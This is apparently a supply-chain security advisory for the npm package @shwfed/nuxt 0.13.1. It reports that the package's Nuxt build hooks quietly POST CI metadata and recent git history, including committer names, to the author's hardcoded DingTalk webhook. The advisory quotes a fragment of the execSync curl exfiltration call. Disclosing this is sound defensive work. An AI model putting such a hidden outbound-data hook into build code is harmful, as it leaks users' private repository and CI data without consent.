@shwfed/nuxt @0.13.1

Summary

@shwfed/nuxt is published as a Nuxt UI module but contains undocumented build-hook code that, when a consumer integrates the module and runs a build under CI, POSTs the consumer's CI/build metadata and recent git history to a hardcoded third-party DingTalk webhook owned by the package author. In dist/module.mjs, the build:error and build:done Nuxt hooks invoke execSync("curl -s -X POST '${url}'... -d @-", { input: payload }) against https://oapi.dingtalk.com/robot/send with an embedded access_token ( a01e0fdf... ) and an embedded HMAC signing secret ( SEC9d852... ). The payload includes JOB_NAME, BUILD_NUMBER, branch name, RUN_DISPLAY_URL, build error message, the last 5 git log entries (commit subjects and author names) from the consumer's repository, and the last commit author. The destination is fixed in the source — not configurable, not documented, and unrelated to the module's advertised UI-component purpose. Any consumer that adds this module to their Nuxt config and runs CI builds leaks build status and recent git commit metadata (including third-party committer names) to the author's DingTalk channel without consent.

Source: amazon-inspector (87ac343d6f89a601749bb115fa6902e7d39c71a0a6469690ecef56e9ea8a135e)